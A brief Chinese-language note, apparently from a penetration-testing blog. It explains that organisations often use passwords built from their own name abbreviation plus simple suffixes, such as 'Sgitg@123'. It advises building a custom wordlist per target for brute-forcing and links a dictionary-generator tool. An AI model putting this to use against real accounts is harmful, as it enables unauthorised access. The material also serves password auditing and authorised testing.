在比较注重安全的单位中,传统的弱口令例如admin、123456、admin123已经很少存在了,很多账号也不是传统admin、system、root这种,更多的是一些单位名称的缩写,例如我们集团的英文缩写是Sgitg,所以很多“弱口令是”这样的Sgitg@123、Sgitg@abc、Sgitg!@#等等,所以在爆破弱口令的时候,可以根据单位的情况,制作专属字典,进行密码爆破

弱口令字典生成工具

DictTools

https://github.com/kkbo8005/dicttools/releases/tag/dict

171249705794344b63cf8258a461e99c3b54453a1d732.png